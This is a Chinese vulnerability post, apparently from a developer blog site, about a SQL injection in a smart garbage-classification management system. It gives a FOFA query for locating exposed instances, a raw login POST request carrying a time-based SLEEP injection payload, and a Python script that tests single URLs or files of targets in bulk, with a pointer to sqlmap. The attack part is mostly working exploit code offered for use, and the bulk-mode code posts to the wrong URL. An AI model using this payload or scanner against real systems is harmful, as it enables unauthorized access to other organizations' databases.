智能垃圾分类管理系统存在SQL注入

简介: 智能垃圾分类管理系统存在SQL注入

漏洞简介

       智慧垃圾分类管理系统应用于智能垃圾桶、厨余垃圾桶、智能果皮箱生产的企业,依托AI技术、人脸识别、移动互联网、大数据、物联网等。该系统存在sql注入漏洞,攻击者可获取数据库敏感信息。

FOFA语句

title="智能垃圾分类管理系统"

漏洞影响

全版本?

漏洞复现

在登陆框抓包


    POST /ghc_master/data/action.admindata.php HTTP/1.1
    Host: xxx.xxx.xxx.xxx
    Content-Length: 96
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.62
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://xxx.xxx.xxx.xxx
    Referer: http://xxx.xxx.xxx.xxx/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
    Connection: close
    do=adminlogin&username=admin' AND (SELECT 2847 FROM (SELECT(SLEEP(5)))trlL)-- sNmL&password=4224

    640.png


    如果在5秒后返回了1,说明存在sql注入漏洞

    python脚本,可批量进行检测


    import requests
    import sys
    import argparse
    from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告
    def lemonlove7():
        print('+++FOFA:title="智能垃圾分类管理系统"')
        print('+++python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
        print('+++python xxx.py -f/--file xxx.txt')
        print('+++作者:lemonlove7')
        print('-----------------------------------------------------')
    if len(sys.argv) == 1:
        lemonlove7()
        sys.exit()
    p = argparse.ArgumentParser(description='lemonlove7')
    p.add_argument('-u','--url',help='目标url',default='')
    p.add_argument('-f','--file',help='文件',default='')
    xp = p.parse_args()
    url = xp.url
    file = xp.file
    data = "do=adminlogin&username=admin' AND (SELECT 2847 FROM (SELECT(SLEEP(5)))trlL)-- sNmL&password=4224"
    headers = {
        'User-Agent': 'Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/90.0.4430.212Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
        'Cookie': 'PHPSESSID=hfq66id9bum90sovr9gmn7klde'
    }
    if url !='':
        url1 = url
        try:
            url = url+'/ghc_master/data/action.admindata.php'
            r = requests.post(url = url ,headers =headers,data=data ,timeout = 15,verify=False)
            if r.text =='1' and r.status_code == 200:
                print(url1 + '存在sql注入')
            else:
                print(url1+'不存在aql注入')
        except:
            print(url1+"异常")
    if file!= '':
        f = open(file,'r+')
        for i in f.readlines():
            url=i.strip()
            if url.startswith('http:') != 1 and url.startswith('https:') != 1:
                url = 'http://' + url
            url =url
            url1 = url
            try:
                t = url + '/ghc_master/data/action.admindata.php'
                r =requests.post(url=url,data=data,headers=headers,timeout=15,verify=False)
                if r.status_code == 200 and '1' in r.text:
                    print(url1+'存在sql注入')
                else:
                    print(url1+'不存在注入')
            except:
                print(url1+'异常')

    运行效果如下

    640.png

    用sqlmap进行sql注入


    • 640.png



    相关文章
    |
    1月前
    |
    SQL 存储 测试技术
    SQL在构建系统中的应用:关键步骤与技巧
    在构建基于数据库的应用系统时,SQL(Structured Query Language)作为与数据库交互的核心语言,扮演着至关重要的角色
    |
    1月前
    |
    SQL 存储 数据库
    SQL在构建系统中的应用:关键要素与编写技巧
    在构建基于数据库的系统时,SQL(Structured Query Language)扮演着至关重要的角色
    |
    2月前
    |
    SQL 安全 数据库
    惊!Python Web安全黑洞大曝光:SQL注入、XSS、CSRF,你中招了吗?
    在数字化时代,Web应用的安全性至关重要。许多Python开发者在追求功能时,常忽视SQL注入、XSS和CSRF等安全威胁。本文将深入剖析这些风险并提供最佳实践:使用参数化查询预防SQL注入;通过HTML转义阻止XSS攻击;在表单中加入CSRF令牌增强安全性。遵循这些方法,可有效提升Web应用的安全防护水平,保护用户数据与隐私。安全需持续关注与改进,每个细节都至关重要。
    134 5
    |
    2月前
    |
    SQL 存储 UED
    系统里这个同时查冷热表的sql,动动手指,从8s降到3s
    系统将交易数据按交易时间分为热表(最近3个月)和冷表(3个月前)。为保证用户体验,当企业门户端查询跨越冷热表时,尤其针对大客户,查询性能优化至关重要。以下是程序的SQL查询语句及其优化版本。
    34 1
    |
    2月前
    |
    SQL 安全 数据库
    深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
    在Web开发领域,Python虽强大灵活,却也面临着SQL注入、XSS与CSRF等安全威胁。本文将剖析这些常见攻击手段,并提供示例代码,展示如何利用参数化查询、HTML转义及CSRF令牌等技术构建坚固防线,确保Python Web应用的安全性。安全之路永无止境,唯有不断改进方能应对挑战。
    70 5
    |
    1月前
    |
    SQL 数据库连接 数据库
    管理系统中的Visual Studio与SQL集成技巧与方法
    在现代软件开发和管理系统中,Visual Studio(VS)作为强大的集成开发环境(IDE),与SQL数据库的紧密集成是构建高效、可靠应用程序的关键
    |
    2月前
    |
    SQL 安全 数据安全/隐私保护
    Python Web安全大挑战:面对SQL注入、XSS、CSRF,你准备好了吗?
    在构建Python Web应用时,安全性至关重要。本文通过三个真实案例,探讨了如何防范SQL注入、XSS和CSRF攻击。首先,通过参数化查询替代字符串拼接,防止SQL注入;其次,利用HTML转义机制,避免XSS攻击;最后,采用CSRF令牌验证,保护用户免受CSRF攻击。这些策略能显著增强应用的安全性,帮助开发者应对复杂的网络威胁。安全是一个持续的过程,需不断学习新知识以抵御不断变化的威胁。
    121 1
    |
    2月前
    |
    SQL 安全 数据库
    Python Web开发者必看!SQL注入、XSS、CSRF全面解析,守护你的网站安全!
    在Python Web开发中,构建安全应用至关重要。本文通过问答形式,详细解析了三种常见Web安全威胁——SQL注入、XSS和CSRF,并提供了实用的防御策略及示例代码。针对SQL注入,建议使用参数化查询;对于XSS,需对输出进行HTML编码;而防范CSRF,则应利用CSRF令牌。通过这些措施,帮助开发者有效提升应用安全性,确保网站稳定运行。
    48 1
    |
    2月前
    |
    SQL 安全 数据库
    深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
    在Web开发领域,Python虽强大灵活,但安全挑战不容小觑。本文剖析Python Web应用中的三大安全威胁:SQL注入、XSS及CSRF,并提供防御策略。通过示例代码展示如何利用参数化查询、HTML转义与CSRF令牌构建安全防线,助您打造更安全的应用。安全是一场持久战,需不断改进优化。
    48 3
    |
    1月前
    |
    SQL 监控 数据库
    管理系统VS SQL:高效集成的关键技巧与方法
    在现代企业信息化建设中,管理系统(如ERP、CRM等)与SQL数据库之间的紧密集成是确保数据流动顺畅、业务逻辑高效执行的关键

    热门文章

    最新文章

    下一篇
    无影云桌面